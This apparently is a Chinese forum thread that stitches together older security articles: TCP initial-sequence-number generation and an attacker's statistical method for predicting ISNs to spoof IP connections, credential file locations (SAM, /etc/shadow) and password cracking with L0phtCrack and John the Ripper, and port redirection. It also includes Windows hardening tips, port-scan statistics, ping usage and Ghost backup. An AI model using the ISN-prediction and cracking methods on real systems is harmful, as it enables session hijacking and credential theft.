  一旦全局ISN空间由上述方法来生成,所有的对TCP ISN的远程攻击都变得不合实际。但是,需要指出的,即使我们依照RFC 1948来实现ISN的生成器,攻击者仍然可以通过特定的条件来获得ISN(这一点在后面叙述).

  另外,用加密的强哈希算法(MD5)来实现ISN的生成器会导致TCP的建立时间延长。所以,有些生成器(如Linux kernel )选择用减少了轮数的MD4函数来提供足够好的安全性同时又把性能下降变得最低。削弱哈希函数的一个地方是每几分钟就需要对生成器做一次re-key 的处理,经过了一次re-key的处理后,安全性提高了,但是,RFC793提到的可靠性却变成另一个问题。

  我们已经知道,严格符合RFC1948的ISN生成方法有一个潜在的危机:

  一个攻击者如果以前合法拥有过一个IP地址,他通过对ISN进行大量的采样,可以估计到随后的ISN的变化规律。在以后,尽管这个IP地址已经不属于此攻击者,但他仍然可以通过猜测ISN来进行IP欺骗。

  以下,我们可以看到RFC 1948的弱点:

  ISN = M + F(sip, sport, dip, dport,

  )

  其中

  ISN 32位的初始序列号

  M 单调增加的计数器

  F 单向散列哈希函数 (例如 MD4 or MD5)

  sip 源IP地址

  sport 源端口

  dip 目的IP地址

  dport 目的端口

  哈希函数可选部分,使远程攻击者更难猜到ISN.

  ISN自身的值是按照一个常数值稳定增加的,所以F()需要保持相对的稳定性。而根据Bellovin 所提出的,是一个系统特定的值(例如机器的启动时间,密码,初始随机数等),这些值并不 会经常变。

  但是,如果Hash函数在实现上存在漏洞(我们无法保证一个绝对安全的Hash函数,况且,它的实现又与操作系统密切相关),攻击者就可以通过大量的采样,来分析,其中,源IP地址,源端口,目的IP地址,目的端口都是不变的,这减少了攻击者分析的难度。

  Linux TCP的ISN生成器避免了这一点。它每5分钟计算一次值,把泄漏的风险降到了最低。

  有一个办法可以做的更好:

  取M = M + R(t)

  ISN = M + F(sip, sport, dip, dport, )

  其中

  R(t) 是一个关于时间的随机函数

  很有必要这样做,因为它使攻击者猜测ISN的难度更大了(弱点在理论上还是存在的)。
其它一些方法

  构造TCP ISN生成器的一些更直接的方法是:简单地选取一些随机数作为ISN。这就是给定一个32位的空间,指定 ISN = R(t)。(假设R()是完全的非伪随机数生成函数)

  固然,对于完全随机的ISN值,攻击者猜测到的可能性是1/232是,随之带来的一个问题是ISN空间里面的值的互相重复。这违反了许多RFC(RFC 793, RFC 1185, RFC 1323, RFC1948等)的假设----ISN单调增加。这将对TCP协议的稳定性和可靠性带来不可预计的问题。

  其它一些由Niels Provos(来自OpenBSD 组织)结合完全随机方法和RFC 1948解决方案:

  ISN = ((PRNG(t)) << 16) + R(t)     32位

  其中

  PRNG(t) :一组随机指定的连续的16位数字  0x00000000 -- 0xffff0000

  R(t) :16位随机数生成器(它的高位msb设成0)0x00000000 -- 0x0000ffff

  上面的公式被用于设计OpenBsd的ISN生成器,相关的源代码可以从下面的网址获得
http://www.openbsd.org/cgi-bin/cvsweb/src/...inet/tcp_subr.c

  Provos的实现方法有效地生成了一组在给定时间内的不会重复的ISN的值,每两个ISN值都至少相差32K,这不但避免了随机方法造成的ISN的值的冲突,而且避免了因为哈希函数计算带来的性能上的下降,但是,它太依赖于系统时钟,一旦系统时钟状态给攻击者知道了,就存在着系统的全局ISN状态泄密的危机。

  TCP ISN生成器的构造方法的安全性评估

  ISN与PRNGs(伪随机数生成器)

  我们很难用一台计算机去生成一些不可预测的数字,因为,计算机被设计成一种以重复和准确的方式去执行一套指令的机器。所以,每个固定的算法都可以在其他机器上生成同样的结果。如果能够推断远程主机的内部状态,攻击者就可以预测它的输出;即使不知道远程主机的PNRG函数,但因为算法最终会使ISN回绕,按一定的规律重复生成以前的ISN,所以,攻击者仍然可以推断ISN。幸运的是,目前条件下,ISN的重复可以延长到几个月甚至几年。但是,仍然有部分PRNG生成器在产生500个元素后就开始回绕。解决伪随机数的方法是引入外部随机源,击键延时,I/O中断,或者其它对攻击者来说不可预知的参数。把这种方法和一个合理的HASH函数结合起来,就可以产生出32位的不可预知的TCP ISN的值,同时又隐蔽了主机的PNRG的内部状态。不幸的是,很少的TCP ISN产生器是按这种思路去设计的,但即使是这样设计的产生器,也会有很多的实现上的漏洞使这个产生器产生的ISN具有可猜测性。

  RFC1948的建议提供了一种比较完善的方法,但是,对攻击者来说,ISN仍然存在着可分析性和猜测性。其中,PRNG的实现是个很关键的地方。
网络安全知识(5)

  Spoofing 集合

  需要知道一点是,如果我们有足够的能力能够同时可以发出232个包,每个包由不同的ISN值,那么,猜中ISN的可能性是100%。但是,无论从带宽或计算机的速度来说都是不实际的。但是,我们仍然可以发大量的包去增加命中的几率,我们把这个发出的攻击包的集合称为Spoofing集合。通常,从计算机速度和网络数据上传速率两方面来考虑,含5000个包的Spoofing的集合对众多的网络用户是没有问题的,5000-60000个包的Spoofing集合对宽带网的用户也是不成问题的,大于60000个包的Spoofing集合则超出一般攻击者的能力。网络的速度和计算机性能的不断增加会提高那种使用穷尽攻击方法猜测ISN的成功率。从攻击者的立场,当然希望能够通过定制一个尽可能小的Spoofing集合,而命中的几率又尽可能高。我们假定我们攻击前先收集50000个包作为ISN值的采样,然后,我们把这些ISN用作对将来的ISN的值猜测的依据。
  一种称为“delay coordinates”的分析方法

  在动态系统和非线性系统中,经常使用一种叫做“delay coordinates”的分析法,这种方法使我们可以通过对以前的数据的采样分析来推想以后的数据。

  我们试图以建立一个三维空间(x,y,z)来观察ISN值(seq[t])的变化,其中t取0,1,2, ……


  方程组(E1)

  现在,对采样了的50000个ISN序列seq[t] 按照上面的三个方程式来构建空间模型A。这样,就可以通过A的图像特征来分析这个PNRG生成的ISN值的规律。A呈现的空间模型的3D特性越强,它的可分析性就越好。

  接着,我们根据这个模型,去分析下一个ISN值seq[t],为此,我们用一个集合K(5000个)去猜测seq[t]。

  如果我们知道seq[t-1],要求seq[t],那么,可以通过在这个三维空间中找出一个有良好特性的节点P(x,y,z),将P.x+seq[t-1],我们就可以得到seq[t]。现在,我们将注意力放到怎样在这个三维空间中选择一些点来构成Spoofing集合,也就是怎样通过seq[t-1],seq[t-2],sea[t-3]来推知seq[t]。

  由于seq[t-1],seq[t-2],seq[t-3]都可以很容易地在远程主机上探测到,于是,P.y和P.z可以通过以下的公式求出
  而对于P.x=seq[t]-seq[t-1], 由于seq[t-1]已知,所以,我们可以把它当作是空间的一条直线。如果,在对以前的ISN的采样,通过上面提到的构成的空间模型A呈现某种很强的特征,我们就可以大胆地假设,seq[t]在直线与A的交点上,或者在交点的附近。这样,seq[t]就这样确定了,于是,seq[t+1],seq[t+2]……,我们都可以推断出来。


  于是,我们大致将构造Spoofing集合分成3个步骤: 

  先选取L与A交点之间的所有点。如果,L与A没有交点,我们则选取离L最近的A的部分点。

  假设现在 seq[t-1]=25

   seq[t-2]=50

   seq[t-3]=88

   于是,我们可以计算出

   y = seq[t-1] - seq[t-2]=25

   z = seq[t-2] - seq[t-3]=33

  而我们在集合A中找不到满足y=25,z=33这个点,但是,我们找到y=24,z=34和y=27,z=35这两个点,所以,我们要把它们加入Spoofing集合。

  我们按照上面的方法,把在A附近(半径<=R1的空间范围内)点集M找出来,然后,我们根据这些点的相应的x值去推导相应的seq[t](按照一定的算法,后面会提到),于是,我们就得到很多的seq[t]。

  根据点集M(j),我们在一定的变化浮动范围U里(-R2<=U<=+R2)处理其x值,得出以下的集合K:

  M(j).x+1 M(j).x-1 M(j).x+2 M(j).x-2 M(j).x+3 M(j).x-3 …… M(j).x+R2 M(j)-R2

  接着我们确定R1和R2的值

      R1值的选取的原则:使M不为空集,一般为1-500个。

      R2值的选取的原则:使K的个数为5000。

  相关系数的意义:

  R1 radius: 影响搜索速度。

  R2 radius: 影响猜测ISN的成功率, R2越大,成功率越高,但代价越大。

  Average error: 反映了在3.3.2中找出的点集的平均距离。一个过分大的平均距离是不需要的。可以通过是否有足够的正确的猜测值来计算Average error。




















网络安全知识(5)


delay coordinates分析法的意义

  站在攻击者的立场,他是千方百计地想缩小搜索空间,他希望先搜索一些最可能的值,然后再去搜索其它可能性没那么大的值。通过delay coordinates,他可以看去观察ISN数列的特征,如果,按照上面的方法构造的空间模型A呈现很明显的空间轮廓,如一个正方体,一个圆柱体,或者一个很小的区域,那么ISN很可能就是这个空间模型A中的一点,搜索空间就会可以从一个巨大的三维空间缩小到一个模型A。看一下一个设计得很好的PRNG(输出为32位):...2179423068, 2635919226, 2992875947, 3492493181, 2448506773, 2252539982, 2067122333, 1029730040, 335648555, 427819739...


  RFC 1948要求我们用31位的输出,但是,32位的搜索空间比31位的要大一倍,所以,在后面的PRNG的设计中,我采用了32位的输出。



网络安全知识(6)


大多数的攻击者都知道操作系统存放文件的缺省位置。如果部门的管理者使用Windows98操作系统和Microsoft Word, Excel或Access,他很可能使用\deskto\My documents目录。攻击者同样知道\windows\start\menu\programs\startup目录的重要性。攻击者可能不知道谁在使用操作系统或文件和目录的布局情况。通过猜测电子表格,数据库和字处理程序缺省存储文件的情况,攻击者可以轻易地获得信息。

  虽然攻击者无法通过浏览器控制系统,但这是建立控制的第一步。利用Cross-frame browsing bug获得的信息要比从网络侦查和渗透阶段获得的信息更详细。通过阅读文件的内容,攻击者会从服务器上获得足够的信息,要想阻止这种攻击手段,系统管理员必须从根本上重新配置服务器。

  审计UNIX文件系统

  Root kit充斥在互联网上,很难察觉并清除它们。从本质上来说,root kit是一种木马。大多数的root kit用各种各样的侦查和记录密码的程序替代了合法的ls,su和ps程序。审计这类程序的最好方法是检查象ls, su和ps等命令在执行时是否正常。大多数替代root kit的程序运行异常,或者有不同的的文件大小。在审计UNIX系统时,要特别注意这些奇怪的现象。下表1列出了常见的UNIX文件的存放位置。

文件名
存放位置

/
根目录

/sbin
管理命令

/bin
用户命令;通常符号连接至/usr/bin

/usr
大部分操作系统

/usr/bin
大部分系统命令

/usr/local
本地安装的软件包

/usr/include
包含文件(用于软件开发)

/usr/src
源代码

/usr/local/src
本地安装的软件包的源代码

/usr/sbin
管理命令的另一个存放位置

/var
数据(日志文件,假脱机文件)

/vr/log
日志文件

/export
被共享的文件系统

/home
用户主目录

/opt
可选的软件

/tmp
临时文件

/proc
虚拟的文件系统,用来访问内核变量


  审计Windows NT

  下列出了在Windows NT中通常文件的存放位置

文件名
位置

\winnt
系统文件目录;包含regedit.exe和注册表日志

\winnt\system32
包含许多子目录,包括config(存放security.log,event.log和application.log文件)

\winnt\profiles
存放与所有用户相关的信息,包括管理配置文件

\winnt\system32\config
包含SAM和SAM.LOG文件,NT注册表还包含密码值

\inetpub
缺省情况下,包含IIS4.0的文件,包括\ftproot,\wwwroot

\program files
服务器上运行的大多数程序的安装目录


  L0phtCrack工具

  L0phtCrack被认为是对系统攻击和防御的有效工具。它对于进行目录攻击和暴力攻击十分有效。它对于破解没有使用像!@#¥%^&*()等特殊字符的密码非常迅速。L0phtCrack可以从http://www.l0pht.com上获得。

  L0pht使用文字列表对密码进行字典攻击,如果字典攻击失败,它会继续使用暴力攻击。这种组合可以快速获得密码。L0pht可以在各种各样的情况下工作。你可以指定IP地址来攻击Windows NT系统。然而,这种方式需要首先登录到目标机器。L0pht还可以对SAM数据库文件进行攻击。管理员从\winnt\repair目录拷贝出SAM账号数据库。第三中方式是配置运行L0pht的计算机嗅探到密码。L0pht可以监听网络上传输的包含密码的会话包,然后对其进行字典攻击。这种方式使用L0pht需要在类似Windows NT这样的操作系统之上,并且你还需要物理地处于传输密码的两个操作系统之间。

  John the Ripper和Crack是在基于UNIX的操作系统上常见的暴力破解密码的程序。这两个工具被用来设计从UNIX上获取密码。所有版本的UNIX操作系统都将用户账号数据库存放在/etc/passwd或/etc/shadow文件中。这些文件在所有UNIX系统中存放在相同的位置。为了使UNIX正常运行,每个用户都必须有读取该文件的权限。

  John the Ripper和Crack是最常见的从shadow和passwd文件中获得密码的程序。这些工具将所有的密码组合与passwd或shadow文件中加密的结果进行比较。一旦发现有吻合的结果就说明找到了密码。

  在你审计UNIX操作系统时,请注意类似的问题。虽然许多扫描程序,如NetRecon和ISS Internet Scanner可以模仿这种工具类型,许多安全专家还是使用像L0pht和John the Ripper来实施审计工作。

  信息重定向

  一旦攻击者控制了系统,他便可以进行程序和端口转向。端口转向成功后,他们可以操控连接并获得有价值的信息。例如,有些攻击者会禁止像FTP的服务,然后把FTP的端口指向另一台计算机。那台计算机会收到所有原来那台主机的连接和文件。

  相似的攻击目标还包括重定向SMTP端口,它也允许攻击者获得重要的信息。例如,攻击者可以获得所有使用SMTP来传送E-mail账号的电子商务服务器的信息。即使这些传输被加密,攻击者还是可以获得这些传输的信息并用字典攻击这些信息。

  通常,攻击者渗透你的操作系统的目的是通过它来渗透到网络上其它的操作系统。例如,NASA服务器是攻击者通常的攻击目标,不仅因为他们想要获取该服务器上的信息,更主要的是许多组织都和该服务器有信任的连接关系,比如Department of Defense。

  因此,许多情况下,攻击者希望攻击其它的系统。为了防止类似的情况发生,美国政府要求那些直接连到政府部门的公司必须按照Rainbow Series的标准来实施管理。从1970年开始,该系列标准帮助系统确定谁可以安全的连接。这个系列中最长被使用的是Department of Defense Trusted Computer System Evaluation Criteria,该文件被成为Orange Book。例如,C2标准是由Orange Book衍生出来并被用来实施可以信任的安全等级。这个等级是C2管理服务(C2Config.exe)在Microsoft NT的服务补丁基础上提供的。
  控制方法

  新的控制方法层出不穷,原因有以下几个。首先是因为系统的升级不可避免的会开启新的安全漏洞,二是少数黑客极有天赋,他们不断开发出新的工具。大多数的UNIX操作系统都有C语言的编译器,攻击者可以建立和修改程序。这一部分讨论一些允许你控制系统的代表性程序。

  系统缺省设置

  缺省设置是指计算机软硬件“Out-of-the-box”的配置,便于厂商技术支持,也可能是因为缺乏时间或忽略了配置。攻击者利用这些缺省设置来完全控制系统。虽然改变系统的缺省设置非常容易,但许多管理员却忽视了这种改变。其实,改变缺省设置可以极大地增强操作系统的安全性。

  合法及非法的服务,守护进程和可装载的模块

  Windows NT运行服务,UNIX运行守护进程,Novell操作系统运行可装载的模块。这些守护进程可以被用来破坏操作系统的安全架构。例如,Windows NT的定时服务以完全控制的权限来执行。如果用户开启了定时服务,他就有可能运行其它的服务,(例如,域用户管理器),从而使用户更容易控制系统














B20层 发表时间: 10-07-16 18:36

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
防范非系统用户破坏


第一招:屏幕保护



在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。



提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。



不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的“在当前位置创建快捷方式”命令,在桌面上为这些屏幕保护程序建立一个快捷方式。此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。



第二招:巧妙隐藏硬盘



在“按Web页”查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,这时单击“显示文件”就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看”标签,选择“显示所有文件”,这样就可以看见这两个文件了)。再按“F5”键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。



接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系,先找到“显示文件”将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开”(如图1),将“要查看该文件夹的内容,请单击”改为“否则,后果自负!”,接着向下拖动滑块到倒数第9行,找到“(file&://%TEMPLATEDIR%\wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d:\tupian\tupian1.jpg”替换“//”后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。



*This file was automatically generated by Microsoft Internet EXPlorer 5.0



*using the file %THISDIRPATH%\folder.htt.



保存并退出,按“F5”键刷新一下,是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中“~”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。







图1



第三招:禁用“开始”菜单命令



在Windows 2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令,在“运行”对话框的“打开”栏中输入“gpedit.msc”,然后单击“确定”按钮即可启动Windows XP组策略编辑器。在“本地计算机策略”中,逐级展开“用户配置→管理模板→任务栏和开始菜单”分支,在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。



在禁用“开始”菜单命令的时候,在右侧窗口中,提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除“我的文档”图标为例,具体操作步骤为:



1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。



2)在弹出窗口的“设置”标签中,选择“已启用”单选按钮,然后单击“确定”即可。



第四招:桌面相关选项的禁用



Windows XP的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支,即可在右侧窗口中显示相应的策略选项。



1)隐藏桌面的系统图标



倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。



若要隐藏桌面上的“网上邻居”和“Internet EXPlorer”图标,只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的Internet EXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将“隐藏和禁用桌面上的所有项目”启用即可。当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后,“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标,那么也可以把它给删除,具体方法是将“从桌面删除回收站”策略项启用。



2)禁止对桌面的某些更改



如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。



第五招:禁止访问“控制面板”



如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支,然后将右侧窗口的“禁止访问控制面板”策略启用即可。



此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从“开始”菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。



提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目,会出现一个消息,说明该设置防止这个操作。



第六招:设置用户权限



当多人共用一台计算机时,在Windows XP中设置用户权限,可以按照以下步骤进行:



1)运行组策略编辑器程序。



2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。



3)双击需要改变的用户权限,单击“添加用户或组”按钮,然后双击想指派给权限的用户账号,最后单击“确定”按钮退出。



第七招:文件夹设置审核



Windows XP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下:



1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支,然后在该分支下选择“审核策略”选项。



2)在右侧窗口中用鼠标双击“审核对象访问”选项,在弹出的“本地安全策略设置”窗口中将“本地策略设置”框内的“成功”和“失败”复选框都打上勾选标记(如图2),然后单击“确定”按钮。



3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性”命令,接着在弹出的窗口中选择“安全”标签。



4)单击“高级”按钮,然后选择“审核”标签。



5)根据具体情况选择你的操作:



倘若对一个新组或用户设置审核,可以单击“添加”按钮,并且在“名称”框中键入新用户名,然后单击“确定”按钮打开“审核项目”对话框。



要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑”按钮。



要删除原有的组或用户审核,可以选择用户名,然后单击“删除”按钮即可。



6)如有必要的话,在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。



7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。



注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在Windows XP审核文件、文件夹之前,你必须启用组策略中“审核策略”的“审核对象访问”。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核







黑客扫描特征及易受攻击的端口

黑客攻击前先扫描
  如今,网络上的黑客攻击已经成了家常便饭,自动攻击和计算机蠕虫病毒正以闪电般的速度在网络上蔓延。 今年7月10日到7月23日,Tel Aviv大学的开放端口就曾经被扫描达96000次,它抵挡了来自99个国家,82000名黑客枪林弹雨般的攻击。就此,ForeScout公司开发了一种叫做ActiveScout的防入侵技术,它有助于查明黑客的企图并防止网络攻击。据它观测,现在具有黑客行为的攻击与扫描具有以下特征:

  约90%的攻击来自蠕虫

  由于蠕虫病毒具有自动攻击和快速繁殖的特性,因此,它占网络攻击的大约90%,通常是系统扫描或同步攻击。其中,大部分网络攻击的来源地是美国。根据ActiveScout的数据,这些蠕虫病毒繁殖迅速,扫描和攻击相隔的时间很短,因此无法人为控制。蠕虫病毒也具有反复攻击的特性,它们会寻找同一端口并大规模入侵这些端口。如果人们不对蠕虫病毒采取防范措施,攻击/扫描的成功率将达到30%,即在10次扫描中,有3次能获得结果并可进行攻击。

  96%的扫描集中在端口

  端口扫描在网络扫描中大约占了96%,UDP(User Datagram Protocol)服务次之,占3.7%。除了这两种之外,剩余的0.3%是用户名和密码扫描、NetBIOS域登录信息和SNMP管理数据等。Tel Aviv大学已经开始努力防止蠕虫攻击和对NetBIOS弱点的网络攻击,因为这些攻击可能会感染所有的Windows系统。同时,在发送流量之前,要求ISP对所有的NetBIOS流量进行过滤。

  有调查表明:在过去的半年中,存在危险性的Internet流量数量已经增加了2倍;暗噪声主要是由网络探测引起的,45%到55%的可疑行为都是黑客对计算机的扫描造成的;大多数攻击都是自动的,小型程序攻击通常来自以前中毒的计算机;黑客攻击这些网络的主要原因是寻找他们能用来传播LJ邮件、为非法文件寻找特别存储空间的计算机,或者占用可用于下一次攻击的机器。
10种端口最易受攻击

  某组织I-Trap曾经收集了来自24个防火墙12小时工作的数据,这些防火墙分别位于美国俄亥俄州24个企业内网和本地ISP所提供的Internet主干网之间。其间,黑客攻击端口的事件有12000次之多,下表是攻击的详细情况。

No. 端口号 服务 攻击事件数 说 明
1 135和445 windows rpc 分别为42次和457次 表明可能感染了最新的windows病毒或蠕虫病毒
2 57 email 56次 黑客利用fx工具对这个端口进行扫描,寻找微软web服务器弱点
3 1080,3128,
6588,8080 代理服务 分别为64、21、21、163次 表示黑客正在进行扫描
4 25 smtp服务 56次 黑客探测smtp服务器并发送LJ邮件信号
5 10000+ 未注册的服务 376次 攻击这些端口通常会返回流量,原因可能是计算机或防火墙配置不当,或者黑客模拟返回流量进行攻击













PING命令及使用技巧


Ping命令的使用技巧

Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据报。根据返回的信息,我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是:成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的,我们必须执行大量的本地主机与远程主机的数据报交换,才能确信TCP/IP的正确性。

  简单的说,Ping就是一个测试程序,如果Ping运行正确,我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送,Ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

  按照缺省设置,Windows上运行的Ping命令发送4个ICMP(网间控制报文协议)回送请求,每个32字节数据,如果一切正常,我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL(Time To Live存在时间)值,我们可以通过TTL值推算一下数据包已经通过了多少个路由器:源地点TTL起始值(就是比返回TTL略大的一个2的乘方数)-返回时TTL值。例如,返回TTL值为119,那么可以推算数据报离开源地址的TTL起始值为128,而源地点到目标地点要通过9个路由器网段(128-119);如果返回TTL值为246,TTL起始值就是256,源地点到目标地点要通过9个路由器网段。

  1、通过Ping检测网络故障的典型次序

  正常情况下,当我们使用Ping命令来查找问题所在或检验网络运行情况时,我们需要使用许多Ping命令,如果所有都运行正确,我们就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:

  ·ping 127.0.0.1
  这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

  ·ping 本机IP
  这个命令被送到我们计算机所配置的IP地址,我们的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。

  ·ping 局域网内其他IP
  这个命令应该离开我们的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。

  ·ping 网关IP
  这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。

  ·ping 远程IP
  如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

  ·ping localhost
  localhost是个作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。

  ·ping www.xxx.com(如www.yesky.com 天极网)
  对这个域名执行Ping www.xxx.com 地址,通常是通过DNS 服务器 如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障(对于拨号上网用户,某些ISP已经不需要设置DNS服务器了)。顺便说一句:我们也可以利用该命令实现域名对IP地址的转换功能。

  如果上面所列出的所有Ping命令都能正常运行,那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示我们所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些方法检测到。

  2、Ping命令的常用参数选项

  ·ping IP Ct
  连续对IP地址执行Ping命令,直到被用户以Ctrl+C中断。

  ·ping IP -l 3000
  指定Ping命令中的数据长度为3000字节,而不是缺省的32字节。

  ·ping IP Cn
  执行特定次数的Ping命令。























GHOST详细解说(1)

一、分区备份

  使用ghost进行系统备份,有整个硬盘(Disk)和分区硬盘(Partition)两种方式。在菜单中点击 Local(本地)项,在右面弹出的菜单中有3个子项,其中 Disk表示备份整个硬盘(即克隆)、Partition 表示备份硬盘的单个分区、Check 表示检查硬盘或备份的文件,查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据,特别是在恢复和复制系统分区时具有实用价值。
  选 Local→Partition→To Image 菜单,弹出硬盘选择窗口,开始分区备份操作。点击该窗口中白色的硬盘信息条,选择硬盘,进入窗口,选择要操作的分区(若没有鼠标,可用键盘进行操作:TAB键进行切换,回车键进行确认,方向键进行选择)。 在弹出的窗口中选择备份储存的目录路径并输入备份文件名称,注意备份文件的名称带有 GHO 的后缀名。 接下来,程序会询问是否压缩备份数据,并给出3个选择:No 表示不压缩,Fast表示压缩比例小而执行备份速度较快,High 就是压缩比例高但执行备份速度相当慢。最后选择 Yes 按钮即开始进行分区硬盘的备份。ghost 备份的速度相当快,不用久等就可以完成,备份的文件以 GHO 后缀名储存在设定的目录中。


二、硬盘克隆与备份

  硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk,在弹出的窗口中选择源硬盘(第一个硬盘),然后选择要复制到的目标硬盘(第二个硬盘)。注意,可以设置目标硬盘各个分区的大小,ghost 可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择 Yes 开始执行。
  ghost 能将目标硬盘复制得与源硬盘几乎完全一样,并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小,必须能将源硬盘的数据内容装下。
  ghost 还提供了一项硬盘备份功能,就是将整个硬盘的数据备份成一个文件保存在硬盘上(菜单 Local→Disk→To Image),然后就可以随时还原到其他硬盘或源硬盘上,这对安装多个系统很方便。使用方法与分区备份相似。


三、备份还原

